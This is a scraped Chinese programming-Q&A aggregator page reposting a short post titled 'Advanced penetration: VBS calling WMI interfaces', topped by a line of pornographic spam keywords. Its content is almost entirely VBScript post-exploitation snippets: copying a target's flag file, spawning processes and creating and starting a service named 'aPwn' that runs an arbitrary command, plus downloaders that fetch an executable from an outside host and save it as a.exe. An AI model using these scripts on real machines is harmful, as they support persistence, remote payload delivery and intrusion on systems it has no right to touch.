日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

高级渗透之VBS调用WMI接口

發布時間:2024/3/13 编程问答 26 豆豆
生活随笔 收集整理的這篇文章主要介紹了 高级渗透之VBS调用WMI接口 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

vbs調用WMI接口復制文件:

Set objWMIService = GetObject("winmgmts://./root/CIMV2") Set colFiles = objWMIService.ExecQuery("SELECT * FROM CIM_DataFIle Where Name='c:\\target\\Flag.dat'") For Each objFile In ColFilesobjFile.Copy("C:\pwn\Flag.dat") Next

創建進程:

Dim objWMIService, objProcess, strShell, objProgram set objWMIService = getobject("winmgmts://./root/cimv2") Set objProcess = objWMIService.Get("Win32_Process") Set objProgram = objProcess.Methods_("Create").InParameters.SpawnInstance_ objProgram.CommandLine = "Calc.exe" objWMIService.ExecMethod "Win32_Process", "Create", objProgram

創建服務:

Const OWN_PROCESS = 16Const NOT_INTERACTIVE = FalseConst NORMAL_ERROR_CONTROL = 2Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")Set objService = objWMIService.Get("Win32_BaseService")errReturn = objService.Create("aPwn" ,"aPWN service" ,"這里修改成要執行的命令", OWN_PROCESS, NORMAL_ERROR_CONTROL, "Manual", NOT_INTERACTIVE, "NT AUTHORITY\LocalService", "" )If errReturn = 23 ThenSet ServiceSet = GetObject("winmgmts:").ExecQuery("select * from Win32_Service where Name='aPwn'")for each Service in ServiceSetService.StartService()nextEnd If

vbs下載文件腳本

Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Dim http,ado Set http = CreateObject("Msxml2.XMLHTTP") http.open "GET","http://192.168.81.192/putty.exe",False http.send Set ado = createobject("Adodb.Stream") ado.Type = adTypeBinary ado.Open ado.Write http.responseBody ado.SaveToFile "c:\download\a.exe" ado.Close

下面這個支持https下載:

Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Dim http,ado Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0") http.SetOption 2, 13056 http.open "GET","https://xxx.com/1.exe",False http.send Set ado = createobject("Adodb.Stream") ado.Type = adTypeBinary ado.Open ado.Write http.responseBody ado.SaveToFile "c:\download\a.exe" ado.Close

總結

以上是生活随笔為你收集整理的高级渗透之VBS调用WMI接口的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。